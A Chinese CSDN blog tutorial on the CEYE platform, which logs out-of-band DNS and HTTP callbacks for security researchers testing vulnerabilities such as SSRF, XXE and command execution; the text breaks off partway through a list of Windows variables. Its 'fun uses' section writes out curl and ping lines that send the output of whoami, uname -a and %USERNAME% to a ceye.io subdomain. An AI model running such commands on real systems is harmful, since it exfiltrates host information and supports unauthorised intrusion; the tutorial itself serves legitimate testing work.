CEYE平台使用简介

CEYE是一个监控平台,用于检测Out-of-Band数据,如DNS和HTTP请求,辅助安全研究人员在漏洞测试中收集信息。通过DNS和HTTP带外信道,CEYE提供回显信息,解决漏洞扫描工具可能的漏扫问题。基本使用包括注册、登录,获取域名标识符,并通过DNS和HTTP查询进行测试。趣味使用涵盖命令执行、SQL注入等,可用于安全研究和漏洞检测。
摘要由CSDN通过智能技术生成

CEYE简介

CEYE是一个用于检测带外数据(Out-of-Band)的监控平台,例如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息(例如SSRF/ XXE/ RCE等)。

CEYE的使用场景

CEYE的诞生也是因为它的使用场景而孕育而生的,一般有两种常见的情况会导致许多漏洞扫描工具漏扫:

  • 漏洞检测或漏洞利用需要进一步的用户或系统交互。
  • 一些漏洞类型没有直接表明攻击是成功的。如Payload触发了却不在前端页面显示。

为了解决这个问题,CEYE至此诞生。CEYE平台通过使用诸如DNS和HTTP之类的带外信道,便可以得到回显信息。

基本使用

注册与登录

CEYE网址:http://ceye.io/

如果你已经有账号了,那么直接登录即可,如果没有则注册一个就OK~

获得自己的域名标识符

在用户注册之后CEYE会为每一个注册用户提供一个具有唯一性的6位数的域名标识符identifier,你可以在你的个人页面中看到:

例如我们的域名标志符为abcdef.ceye.io,那么所有来自于abcdef.ceye.io或者*.abcdef.ceye.io的DNS查询和http的请求都会被记录下来,而通过查看这些记录下来的信息,安全研究人员可以确定并改进自己的漏洞研究方案。

简易测试

通过DNS带外信道检测Bind Payload的执行情况:

DNS查询可以以多种不同的方式进行解析。CEYE.IO平台提供了一台DNS Server来解析域名。它的 nameserver address 被设置为自己的服务器IP,因此所有关于ceye.io 的域名的DNS查询最终都会被发送到CEYE的DNS服务器。

例如,在终端中使用 nslookup:

之后再CEYE平台中会有记录:

趣味使用

CEYE.IO平台拥有自己的HTTP服务器,记录用户域名的所有请求。这可以用来做一些有趣的事情:

A、命令执行

Linux:

curl -X POST http://ip.port.xxxxxx.ceye.io/`whoami`

之后再CEYE平台上会外带处whoami的执行结果:

再如:

curl http://ip.port.xxxxxx.ceye.io/`uname -a`

之后可以查看内核版本:

Windows:

ping %USERNAME%.xxxxxx.ceye.io

CEYE平台中的回显:

一些常见的Windows变量:

//变量                     类型       描述
//%ALLUS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值